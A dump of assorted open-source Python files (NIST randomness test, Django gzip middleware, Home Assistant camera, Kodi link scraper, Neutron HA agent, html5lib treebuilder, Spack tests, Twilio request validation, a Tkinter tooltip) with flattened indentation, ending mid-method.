| gpl-3.0 |
dj-on-github/sp800_22_tests | sp800_22_longest_run_ones_in_a_block_test.py | 1 | 3544 | #!/usr/bin/env python
# sp800_22_longest_run_ones_in_a_block_test.pylon
#
# Copyright (C) 2017 David Johnston
# This program is distributed under the terms of the GNU General Public License.
#
# This file is part of sp800_22_tests.
#
# sp800_22_tests is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# sp800_22_tests is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with sp800_22_tests. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import math
#from scipy.special import gamma, gammainc, gammaincc
from gamma_functions import *
import random
def probs(K,M,i):
M8 = [0.2148, 0.3672, 0.2305, 0.1875]
M128 = [0.1174, 0.2430, 0.2493, 0.1752, 0.1027, 0.1124]
M512 = [0.1170, 0.2460, 0.2523, 0.1755, 0.1027, 0.1124]
M1000 = [0.1307, 0.2437, 0.2452, 0.1714, 0.1002, 0.1088]
M10000 = [0.0882, 0.2092, 0.2483, 0.1933, 0.1208, 0.0675, 0.0727]
if (M == 8): return M8[i]
elif (M == 128): return M128[i]
elif (M == 512): return M512[i]
elif (M == 1000): return M1000[i]
else: return M10000[i]
def longest_run_ones_in_a_block_test(bits):
n = len(bits)
if n < 128:
return (False,1.0,None)
elif n<6272:
M = 8
elif n<750000:
M = 128
else:
M = 10000
# compute new values for K & N
if M==8:
K=3
N=16
elif M==128:
K=5
N=49
else:
K=6
N=75
# Table of frequencies
v = [0,0,0,0,0,0,0]
for i in range(N): # over each block
#find longest run
block = bits[i*M:((i+1)*M)] # Block i
run = 0
longest = 0
for j in range(M): # Count the bits.
if block[j] == 1:
run += 1
if run > longest:
longest = run
else:
run = 0
if M == 8:
if longest <= 1: v[0] += 1
elif longest == 2: v[1] += 1
elif longest == 3: v[2] += 1
else: v[3] += 1
elif M == 128:
if longest <= 4: v[0] += 1
elif longest == 5: v[1] += 1
elif longest == 6: v[2] += 1
elif longest == 7: v[3] += 1
elif longest == 8: v[4] += 1
else: v[5] += 1
else:
if longest <= 10: v[0] += 1
elif longest == 11: v[1] += 1
elif longest == 12: v[2] += 1
elif longest == 13: v[3] += 1
elif longest == 14: v[4] += 1
elif longest == 15: v[5] += 1
else: v[6] += 1
# Compute Chi-Sq
chi_sq = 0.0
for i in range(K+1):
p_i = probs(K,M,i)
upper = (v[i] - N*p_i)**2
lower = N*p_i
chi_sq += upper/lower
print(" n = "+str(n))
print(" K = "+str(K))
print(" M = "+str(M))
print(" N = "+str(N))
print(" chi_sq = "+str(chi_sq))
p = gammaincc(K/2.0, chi_sq/2.0)
success = (p >= 0.01)
return (success,p,None)
| gpl-2.0 |
nhippenmeyer/django | django/middleware/gzip.py | 478 | 1831 | import re
from django.utils.cache import patch_vary_headers
from django.utils.text import compress_sequence, compress_string
re_accepts_gzip = re.compile(r'\bgzip\b')
class GZipMiddleware(object):
"""
This middleware compresses content if the browser allows gzip compression.
It sets the Vary header accordingly, so that caches will base their storage
on the Accept-Encoding header.
"""
def process_response(self, request, response):
# It's not worth attempting to compress really short responses.
if not response.streaming and len(response.content) < 200:
return response
# Avoid gzipping if we've already got a content-encoding.
if response.has_header('Content-Encoding'):
return response
patch_vary_headers(response, ('Accept-Encoding',))
ae = request.META.get('HTTP_ACCEPT_ENCODING', '')
if not re_accepts_gzip.search(ae):
return response
if response.streaming:
# Delete the `Content-Length` header for streaming content, because
# we won't know the compressed size until we stream it.
response.streaming_content = compress_sequence(response.streaming_content)
del response['Content-Length']
else:
# Return the compressed content only if it's actually shorter.
compressed_content = compress_string(response.content)
if len(compressed_content) >= len(response.content):
return response
response.content = compressed_content
response['Content-Length'] = str(len(response.content))
if response.has_header('ETag'):
response['ETag'] = re.sub('"$', ';gzip"', response['ETag'])
response['Content-Encoding'] = 'gzip'
return response
| bsd-3-clause |
joopert/home-assistant | homeassistant/components/august/camera.py | 5 | 2038 | """Support for August camera."""
from datetime import timedelta
import requests
from homeassistant.components.camera import Camera
from . import DATA_AUGUST, DEFAULT_TIMEOUT
SCAN_INTERVAL = timedelta(seconds=5)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up August cameras."""
data = hass.data[DATA_AUGUST]
devices = []
for doorbell in data.doorbells:
devices.append(AugustCamera(data, doorbell, DEFAULT_TIMEOUT))
add_entities(devices, True)
class AugustCamera(Camera):
"""An implementation of a Canary security camera."""
def __init__(self, data, doorbell, timeout):
"""Initialize a Canary security camera."""
super().__init__()
self._data = data
self._doorbell = doorbell
self._timeout = timeout
self._image_url = None
self._image_content = None
@property
def name(self):
"""Return the name of this device."""
return self._doorbell.device_name
@property
def is_recording(self):
"""Return true if the device is recording."""
return self._doorbell.has_subscription
@property
def motion_detection_enabled(self):
"""Return the camera motion detection status."""
return True
@property
def brand(self):
"""Return the camera brand."""
return "August"
@property
def model(self):
"""Return the camera model."""
return "Doorbell"
def camera_image(self):
"""Return bytes of camera image."""
latest = self._data.get_doorbell_detail(self._doorbell.device_id)
if self._image_url is not latest.image_url:
self._image_url = latest.image_url
self._image_content = requests.get(
self._image_url, timeout=self._timeout
).content
return self._image_content
@property
def unique_id(self) -> str:
"""Get the unique id of the camera."""
return f"{self._doorbell.device_id:s}_camera"
| apache-2.0 |
markeTIC/l10n-spain | l10n_es_aeat_mod340/__init__.py | 14 | 1171 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 20011 Ting (http://www.ting.es)
# Copyright (c) 2011-2013 Acysos S.L. (http://acysos.com)
# Ignacio Ibeas Izquierdo <ignacio@acysos.com>
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import report
from . import wizard
from . import models
| agpl-3.0 |
Coelhon/MasterRepo.repository | plugin.video.zen/resources/lib/sources/myvideolink.py | 1 | 6153 | # -*- coding: utf-8 -*-
'''
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse,random
from resources.lib.modules import control
from resources.lib.modules import cleantitle
from resources.lib.modules import client
debridstatus = control.setting('debridsources')
from resources.lib.modules.common import random_agent
from BeautifulSoup import BeautifulSoup
from schism_net import OPEN_URL
import requests
from schism_commons import quality_tag, google_tag, parseDOM, replaceHTMLCodes ,cleantitle_get, cleantitle_get_2, cleantitle_query, get_size, cleantitle_get_full
class source:
def __init__(self):
self.domains = ['newmyvideolink.xyz']
self.base_link = control.setting('myvideolink_base')
if self.base_link == '' or self.base_link == None:self.base_link = 'http://newmyvideolink.xyz'
self.search_link = '?s=%s+%s'
# r = client.parseDOM(req, 'h2', attrs = {'class': 'post-title'})
# r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
def movie(self, imdb, title, year):
self.zen_url = []
try:
if not debridstatus == 'true': raise Exception()
print( "MYVIDEOLINK 2")
self.real_link = self.base_link
title = cleantitle.getsearch(title)
cleanmovie = cleantitle.get(title)
type = 'zen_movies'
query = self.search_link % (urllib.quote_plus(title),year)
query = urlparse.urljoin(self.real_link, query)
req = OPEN_URL(query).content
r = client.parseDOM(req, 'h2', attrs = {'class': 'post-titl.+?'})
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
r = [(i[0][0], i[1][0]) for i in r ]
r = [(i[0], i[1]) for i in r if cleanmovie in cleantitle.get(i[1]) and year in i[1]]
u = [(i[0].encode('utf-8'), i[1].encode('utf-8'), type) for i in r]
self.zen_url += u
print ("MOVIES PASSED MYVIDEOLINK", self.zen_url)
return self.zen_url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, year):
try:
url = {'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
self.zen_url = []
try:
if not debridstatus == 'true': raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['tvshowtitle'] if 'tvshowtitle' in data else data['title']
title = cleantitle.getsearch(title)
cleanmovie = cleantitle.get(title)
self.real_link = self.base_link
type = 'zen_shows'
data['season'], data['episode'] = season, episode
episodecheck = 'S%02dE%02d' % (int(data['season']), int(data['episode']))
episodecheck = str(episodecheck).lower()
query = 'S%02dE%02d' % (int(data['season']), int(data['episode']))
query = self.search_link % (urllib.quote_plus(title),query)
query = urlparse.urljoin(self.real_link, query)
req = OPEN_URL(query).content
r = client.parseDOM(req, 'h2', attrs = {'class': 'post-titl.+?'})
r = [(client.parseDOM(i, 'a', ret='href'), client.parseDOM(i, 'a', ret='title')) for i in r]
r = [(i[0][0], i[1][0]) for i in r ]
r = [(i[0], i[1]) for i in r if cleanmovie in cleantitle.get(i[1]) and episodecheck in cleantitle.get(i[1])]
u = [(i[0].encode('utf-8'), i[1].encode('utf-8'), type) for i in r]
self.zen_url += u
print ("MYVIDEOLINK SHOWS", self.zen_url)
return self.zen_url
except:
return
def get_refresh(self):
r = OPEN_URL(self.base_link, timeout='10').text
print ("MYVIDEOLINK OPENURL", r)
checkrefresh = re.findall('<div class="post">(.+?)</div>', r)[0]
checkrefresh2 = re.findall('<meta http-equiv="refresh"', r)[0]
if checkrefresh and "http" in checkrefresh:
print ("MYVIDEOLINK FOUND REDIRECT")
s = checkrefresh.encode('utf-8')
print ("MYVIDEOLINK REDIRECT", s)
if not s.startswith("http"): s = "http://" + s
url = s.encode('utf-8')
return url
elif checkrefresh2:
print ("MYVIDEOLINK FOUND REDIRECT")
s = re.findall("URL='(http.+?)'", r)[0]
print ("MYVIDEOLINK REDIRECT", s)
url = s.encode('utf-8')
return url
else:
url = client.request(self.base_link, output='geturl')
return url
def sources(self, url, hostDict, hostprDict):
try:
sources = []
for url,title,type in self.zen_url:
req = OPEN_URL(url).content
pattern = '<h1>(.*?)</h1(.*?)</ul>'
html = re.compile(pattern, re.DOTALL).findall(req)
for titles, block in html:
quality = "SD"
quality = quality_tag(titles)
info = ''
if "hevc" in titles.lower(): info = "HEVC"
info = get_size(block)
links = re.compile('href="([^"]+)').findall(block)
for href in links:
if any(value in href for value in hostprDict):
try:host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(href.strip().lower()).netloc)[0]
except: host = 'Videomega'
url = client.replaceHTMLCodes(href)
url = url.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'provider': 'Myvideolink', 'url': url, 'info': info,'direct': False, 'debridonly': True})
return sources
except:
return sources
def resolve(self, url):
return url | gpl-2.0 |
MaximNevrov/neutron | neutron/agent/l3/ha.py | 6 | 7240 | # Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
import webob
from neutron._i18n import _, _LI
from neutron.agent.linux import keepalived
from neutron.agent.linux import utils as agent_utils
from neutron.common import utils as common_utils
from neutron.notifiers import batch_notifier
LOG = logging.getLogger(__name__)
KEEPALIVED_STATE_CHANGE_SERVER_BACKLOG = 4096
OPTS = [
cfg.StrOpt('ha_confs_path',
default='$state_path/ha_confs',
help=_('Location to store keepalived/conntrackd '
'config files')),
cfg.StrOpt('ha_vrrp_auth_type',
default='PASS',
choices=keepalived.VALID_AUTH_TYPES,
help=_('VRRP authentication type')),
cfg.StrOpt('ha_vrrp_auth_password',
help=_('VRRP authentication password'),
secret=True),
cfg.IntOpt('ha_vrrp_advert_int',
default=2,
help=_('The advertisement interval in seconds')),
]
class KeepalivedStateChangeHandler(object):
def __init__(self, agent):
self.agent = agent
@webob.dec.wsgify(RequestClass=webob.Request)
def __call__(self, req):
router_id = req.headers['X-Neutron-Router-Id']
state = req.headers['X-Neutron-State']
self.enqueue(router_id, state)
def enqueue(self, router_id, state):
LOG.debug('Handling notification for router '
'%(router_id)s, state %(state)s', {'router_id': router_id,
'state': state})
self.agent.enqueue_state_change(router_id, state)
class L3AgentKeepalivedStateChangeServer(object):
def __init__(self, agent, conf):
self.agent = agent
self.conf = conf
agent_utils.ensure_directory_exists_without_file(
self.get_keepalived_state_change_socket_path(self.conf))
@classmethod
def get_keepalived_state_change_socket_path(cls, conf):
return os.path.join(conf.state_path, 'keepalived-state-change')
def run(self):
server = agent_utils.UnixDomainWSGIServer(
'neutron-keepalived-state-change')
server.start(KeepalivedStateChangeHandler(self.agent),
self.get_keepalived_state_change_socket_path(self.conf),
workers=0,
backlog=KEEPALIVED_STATE_CHANGE_SERVER_BACKLOG)
server.wait()
class AgentMixin(object):
def __init__(self, host):
self._init_ha_conf_path()
super(AgentMixin, self).__init__(host)
self.state_change_notifier = batch_notifier.BatchNotifier(
self._calculate_batch_duration(), self.notify_server)
eventlet.spawn(self._start_keepalived_notifications_server)
def _start_keepalived_notifications_server(self):
state_change_server = (
L3AgentKeepalivedStateChangeServer(self, self.conf))
state_change_server.run()
def _calculate_batch_duration(self):
# Slave becomes the master after not hearing from it 3 times
detection_time = self.conf.ha_vrrp_advert_int * 3
# Keepalived takes a couple of seconds to configure the VIPs
configuration_time = 2
# Give it enough slack to batch all events due to the same failure
return (detection_time + configuration_time) * 2
def enqueue_state_change(self, router_id, state):
LOG.info(_LI('Router %(router_id)s transitioned to %(state)s'),
{'router_id': router_id,
'state': state})
try:
ri = self.router_info[router_id]
except KeyError:
LOG.info(_LI('Router %s is not managed by this agent. It was '
'possibly deleted concurrently.'), router_id)
return
self._configure_ipv6_ra_on_ext_gw_port_if_necessary(ri, state)
if self.conf.enable_metadata_proxy:
self._update_metadata_proxy(ri, router_id, state)
self._update_radvd_daemon(ri, state)
self.state_change_notifier.queue_event((router_id, state))
def _configure_ipv6_ra_on_ext_gw_port_if_necessary(self, ri, state):
# If ipv6 is enabled on the platform, ipv6_gateway config flag is
# not set and external_network associated to the router does not
# include any IPv6 subnet, enable the gateway interface to accept
# Router Advts from upstream router for default route.
ex_gw_port_id = ri.ex_gw_port and ri.ex_gw_port['id']
if state == 'master' and ex_gw_port_id and ri.use_ipv6:
gateway_ips = ri._get_external_gw_ips(ri.ex_gw_port)
if not ri.is_v6_gateway_set(gateway_ips):
interface_name = ri.get_external_device_name(ex_gw_port_id)
if ri.router.get('distributed', False):
namespace = ri.ha_namespace
else:
namespace = ri.ns_name
ri.driver.configure_ipv6_ra(namespace, interface_name)
def _update_metadata_proxy(self, ri, router_id, state):
if state == 'master':
LOG.debug('Spawning metadata proxy for router %s', router_id)
self.metadata_driver.spawn_monitored_metadata_proxy(
self.process_monitor, ri.ns_name, self.conf.metadata_port,
self.conf, router_id=ri.router_id)
else:
LOG.debug('Closing metadata proxy for router %s', router_id)
self.metadata_driver.destroy_monitored_metadata_proxy(
self.process_monitor, ri.router_id, self.conf)
def _update_radvd_daemon(self, ri, state):
# Radvd has to be spawned only on the Master HA Router. If there are
# any state transitions, we enable/disable radvd accordingly.
if state == 'master':
ri.enable_radvd()
else:
ri.disable_radvd()
def notify_server(self, batched_events):
translation_map = {'master': 'active',
'backup': 'standby',
'fault': 'standby'}
translated_states = dict((router_id, translation_map[state]) for
router_id, state in batched_events)
LOG.debug('Updating server with HA routers states %s',
translated_states)
self.plugin_rpc.update_ha_routers_states(
self.context, translated_states)
def _init_ha_conf_path(self):
ha_full_path = os.path.dirname("/%s/" % self.conf.ha_confs_path)
common_utils.ensure_dir(ha_full_path)
| apache-2.0 |
TheDegree0/menescraper | menescraper/menescraper/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/etree.py | 915 | 12621 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
import re
from . import _base
from .. import ihatexml
from .. import constants
from ..constants import namespaces
from ..utils import moduleFactoryFactory
tag_regexp = re.compile("{([^}]*)}(.*)")
def getETreeBuilder(ElementTreeImplementation, fullTree=False):
ElementTree = ElementTreeImplementation
ElementTreeCommentType = ElementTree.Comment("asd").tag
class Element(_base.Node):
def __init__(self, name, namespace=None):
self._name = name
self._namespace = namespace
self._element = ElementTree.Element(self._getETreeTag(name,
namespace))
if namespace is None:
self.nameTuple = namespaces["html"], self._name
else:
self.nameTuple = self._namespace, self._name
self.parent = None
self._childNodes = []
self._flags = []
def _getETreeTag(self, name, namespace):
if namespace is None:
etree_tag = name
else:
etree_tag = "{%s}%s" % (namespace, name)
return etree_tag
def _setName(self, name):
self._name = name
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getName(self):
return self._name
name = property(_getName, _setName)
def _setNamespace(self, namespace):
self._namespace = namespace
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getNamespace(self):
return self._namespace
namespace = property(_getNamespace, _setNamespace)
def _getAttributes(self):
return self._element.attrib
def _setAttributes(self, attributes):
# Delete existing attributes first
# XXX - there may be a better way to do this...
for key in list(self._element.attrib.keys()):
del self._element.attrib[key]
for key, value in attributes.items():
if isinstance(key, tuple):
name = "{%s}%s" % (key[2], key[1])
else:
name = key
self._element.set(name, value)
attributes = property(_getAttributes, _setAttributes)
def _getChildNodes(self):
return self._childNodes
def _setChildNodes(self, value):
del self._element[:]
self._childNodes = []
for element in value:
self.insertChild(element)
childNodes = property(_getChildNodes, _setChildNodes)
def hasContent(self):
"""Return true if the node has children or text"""
return bool(self._element.text or len(self._element))
def appendChild(self, node):
self._childNodes.append(node)
self._element.append(node._element)
node.parent = self
def insertBefore(self, node, refNode):
index = list(self._element).index(refNode._element)
self._element.insert(index, node._element)
node.parent = self
def removeChild(self, node):
self._element.remove(node._element)
node.parent = None
def insertText(self, data, insertBefore=None):
if not(len(self._element)):
if not self._element.text:
self._element.text = ""
self._element.text += data
elif insertBefore is None:
# Insert the text as the tail of the last child element
if not self._element[-1].tail:
self._element[-1].tail = ""
self._element[-1].tail += data
else:
# Insert the text before the specified node
children = list(self._element)
index = children.index(insertBefore._element)
if index > 0:
if not self._element[index - 1].tail:
self._element[index - 1].tail = ""
self._element[index - 1].tail += data
else:
if not self._element.text:
self._element.text = ""
self._element.text += data
def cloneNode(self):
element = type(self)(self.name, self.namespace)
for name, value in self.attributes.items():
element.attributes[name] = value
return element
def reparentChildren(self, newParent):
if newParent.childNodes:
newParent.childNodes[-1]._element.tail += self._element.text
else:
if not newParent._element.text:
newParent._element.text = ""
if self._element.text is not None:
newParent._element.text += self._element.text
self._element.text = ""
_base.Node.reparentChildren(self, newParent)
class Comment(Element):
def __init__(self, data):
# Use the superclass constructor to set all properties on the
# wrapper element
self._element = ElementTree.Comment(data)
self.parent = None
self._childNodes = []
self._flags = []
def _getData(self):
return self._element.text
def _setData(self, value):
self._element.text = value
data = property(_getData, _setData)
class DocumentType(Element):
def __init__(self, name, publicId, systemId):
Element.__init__(self, "<!DOCTYPE>")
self._element.text = name
self.publicId = publicId
self.systemId = systemId
def _getPublicId(self):
return self._element.get("publicId", "")
def _setPublicId(self, value):
if value is not None:
self._element.set("publicId", value)
publicId = property(_getPublicId, _setPublicId)
def _getSystemId(self):
return self._element.get("systemId", "")
def _setSystemId(self, value):
if value is not None:
self._element.set("systemId", value)
systemId = property(_getSystemId, _setSystemId)
class Document(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_ROOT")
class DocumentFragment(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_FRAGMENT")
def testSerializer(element):
rv = []
def serializeElement(element, indent=0):
if not(hasattr(element, "tag")):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
rv.append("#document")
if element.text is not None:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
elif element.tag == ElementTreeCommentType:
rv.append("|%s<!-- %s -->" % (' ' * indent, element.text))
else:
assert isinstance(element.tag, text_type), \
"Expected unicode, got %s, %s" % (type(element.tag), element.tag)
nsmatch = tag_regexp.match(element.tag)
if nsmatch is None:
name = element.tag
else:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
name = "%s %s" % (prefix, name)
rv.append("|%s<%s>" % (' ' * indent, name))
if hasattr(element, "attrib"):
attributes = []
for name, value in element.attrib.items():
nsmatch = tag_regexp.match(name)
if nsmatch is not None:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
attr_string = "%s %s" % (prefix, name)
else:
attr_string = name
attributes.append((attr_string, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value))
if element.text:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
indent += 2
for child in element:
serializeElement(child, indent)
if element.tail:
rv.append("|%s\"%s\"" % (' ' * (indent - 2), element.tail))
serializeElement(element, 0)
return "\n".join(rv)
def tostring(element):
"""Serialize an element and its child nodes to a string"""
rv = []
filter = ihatexml.InfosetFilter()
def serializeElement(element):
if isinstance(element, ElementTree.ElementTree):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s PUBLIC "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
if element.text is not None:
rv.append(element.text)
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
for child in element:
serializeElement(child)
elif element.tag == ElementTreeCommentType:
rv.append("<!--%s-->" % (element.text,))
else:
# This is assumed to be an ordinary element
if not element.attrib:
rv.append("<%s>" % (filter.fromXmlName(element.tag),))
else:
attr = " ".join(["%s=\"%s\"" % (
filter.fromXmlName(name), value)
for name, value in element.attrib.items()])
rv.append("<%s %s>" % (element.tag, attr))
if element.text:
rv.append(element.text)
for child in element:
serializeElement(child)
rv.append("</%s>" % (element.tag,))
if element.tail:
rv.append(element.tail)
serializeElement(element)
return "".join(rv)
class TreeBuilder(_base.TreeBuilder):
documentClass = Document
doctypeClass = DocumentType
elementClass = Element
commentClass = Comment
fragmentClass = DocumentFragment
implementation = ElementTreeImplementation
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
if fullTree:
return self.document._element
else:
if self.defaultNamespace is not None:
return self.document._element.find(
"{%s}html" % self.defaultNamespace)
else:
return self.document._element.find("html")
def getFragment(self):
return _base.TreeBuilder.getFragment(self)._element
return locals()
getETreeModule = moduleFactoryFactory(getETreeBuilder)
| gpl-2.0 |
iulian787/spack | lib/spack/spack/test/cmd/print_shell_vars.py | 5 | 1315 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.main import print_setup_info
def test_print_shell_vars_sh(capsys):
print_setup_info('sh')
out, _ = capsys.readouterr()
assert "_sp_sys_type=" in out
assert "_sp_tcl_roots=" in out
assert "_sp_lmod_roots=" in out
assert "_sp_module_prefix" not in out
def test_print_shell_vars_csh(capsys):
print_setup_info('csh')
out, _ = capsys.readouterr()
assert "set _sp_sys_type = " in out
assert "set _sp_tcl_roots = " in out
assert "set _sp_lmod_roots = " in out
assert "set _sp_module_prefix = " not in out
def test_print_shell_vars_sh_modules(capsys):
print_setup_info('sh', 'modules')
out, _ = capsys.readouterr()
assert "_sp_sys_type=" in out
assert "_sp_tcl_roots=" in out
assert "_sp_lmod_roots=" in out
assert "_sp_module_prefix=" in out
def test_print_shell_vars_csh_modules(capsys):
print_setup_info('csh', 'modules')
out, _ = capsys.readouterr()
assert "set _sp_sys_type = " in out
assert "set _sp_tcl_roots = " in out
assert "set _sp_lmod_roots = " in out
assert "set _sp_module_prefix = " in out
| lgpl-2.1 |
makaimc/video-service-django | twilio/util.py | 47 | 5420 | import base64
import hmac
import time
from hashlib import sha1
from . import jwt
from .compat import izip, urlencode
from six import iteritems, PY3
class RequestValidator(object):
def __init__(self, token):
self.token = token.encode("utf-8")
def compute_signature(self, uri, params, utf=PY3):
"""Compute the signature for a given request
:param uri: full URI that Twilio requested on your server
:param params: post vars that Twilio sent with the request
:param utf: whether return should be bytestring or unicode (python3)
:returns: The computed signature
"""
s = uri
if len(params) > 0:
for k, v in sorted(params.items()):
s += k + v
# compute signature and compare signatures
mac = hmac.new(self.token, s.encode("utf-8"), sha1)
computed = base64.b64encode(mac.digest())
if utf:
computed = computed.decode('utf-8')
return computed.strip()
def validate(self, uri, params, signature):
"""Validate a request from Twilio
:param uri: full URI that Twilio requested on your server
:param params: post vars that Twilio sent with the request
:param signature: expexcted signature in HTTP X-Twilio-Signature header
:returns: True if the request passes validation, False if not
"""
return secure_compare(self.compute_signature(uri, params), signature)
def secure_compare(string1, string2):
"""Compare two strings while protecting against timing attacks
:param str string1: the first string
:param str string2: the second string
:returns: True if the strings are equal, False if not
:rtype: :obj:`bool`
"""
if len(string1) != len(string2):
return False
result = True
for c1, c2 in izip(string1, string2):
result &= c1 == c2
return result
class TwilioCapability(object):
"""
A token to control permissions with Twilio Client
:param str account_sid: the account sid to which this token
is granted access
:param str auth_token: the secret key used to sign the token.
Note, this auth token is not visible to the
user of the token.
:returns: A new TwilioCapability with zero permissions
"""
def __init__(self, account_sid, auth_token):
self.account_sid = account_sid
self.auth_token = auth_token
self.capabilities = {}
self.client_name = None
def payload(self):
"""Return the payload for this token."""
if "outgoing" in self.capabilities and self.client_name is not None:
scope = self.capabilities["outgoing"]
scope.params["clientName"] = self.client_name
capabilities = self.capabilities.values()
scope_uris = [str(scope_uri) for scope_uri in capabilities]
return {
"scope": " ".join(scope_uris)
}
def generate(self, expires=3600):
"""Generate a valid JWT token with an expiration date.
:param int expires: The token lifetime, in seconds. Defaults to
1 hour (3600)
"""
payload = self.payload()
payload['iss'] = self.account_sid
payload['exp'] = int(time.time() + expires)
return jwt.encode(payload, self.auth_token)
def allow_client_outgoing(self, application_sid, **kwargs):
"""Allow the user of this token to make outgoing connections.
Keyword arguments are passed to the application.
:param str application_sid: Application to contact
"""
scope_params = {
"appSid": application_sid,
}
if kwargs:
scope_params["appParams"] = urlencode(kwargs, doseq=True)
self.capabilities["outgoing"] = ScopeURI("client", "outgoing",
scope_params)
def allow_client_incoming(self, client_name):
"""If the user of this token should be allowed to accept incoming
connections then configure the TwilioCapability through this method and
specify the client name.
:param str client_name: Client name to accept calls from
"""
self.client_name = client_name
self.capabilities["incoming"] = ScopeURI("client", "incoming", {
'clientName': client_name
})
def allow_event_stream(self, **kwargs):
"""Allow the user of this token to access their event stream."""
scope_params = {
"path": "/2010-04-01/Events",
}
if kwargs:
scope_params['params'] = urlencode(kwargs, doseq=True)
self.capabilities["events"] = ScopeURI("stream", "subscribe",
scope_params)
class ScopeURI(object):
def __init__(self, service, privilege, params=None):
self.service = service
self.privilege = privilege
self.params = params
def __str__(self):
if self.params:
sorted_params = sorted([(k, v) for k, v in iteritems(self.params)])
encoded_params = urlencode(sorted_params)
param_string = '?%s' % encoded_params
else:
param_string = ''
return "scope:%s:%s%s" % (self.service, self.privilege, param_string)
| mit |
QuantCrimAtLeeds/PredictCode | open_cp/gui/tk/tooltips.py | 1 | 4717 | """
tooltips
~~~~~~~~
Simple way to add tooltips to a widget.
Idea from https://stackoverflow.com/questions/3221956/what-is-the-simplest-way-to-make-tooltips-in-tkinter
"""
import datetime
import tkinter as tk
import tkinter.ttk as ttk
class ToolTip():
"""Class to display a tooltip over a widget. Works by monitoring when the
pointer moves over (or off) the widget. If the pointer moves over a widget
and stays over the widget for a timeout, then the tooltip is displayed.
The tooltip will be removed once the pointer leaves the widget.
Change settings by adjusting the attributes.
The tooltip is displayed using a `ttk.Label` instance. You may subclass
and override :method:`configure_label` to change the appearance.
:param widget: The widget to monitor.
:param text: The text to display.
"""
def __init__(self, widget, text):
self._widget = widget
self._text = text
self.timeout = 500
self.width = 250
self._future_id = None
self._tool_tip_window = None
self._widget.bind("<Enter>", self._enter, add=True)
self._widget.bind("<Leave>", self._leave, add=True)
self._widget.bind("<ButtonPress>", self._leave, add=True)
def _enter(self, event=None):
try:
if str(self._widget["state"]) == tk.DISABLED:
return
except Exception as ex:
pass
self._start_timer()
def _leave(self, event=None):
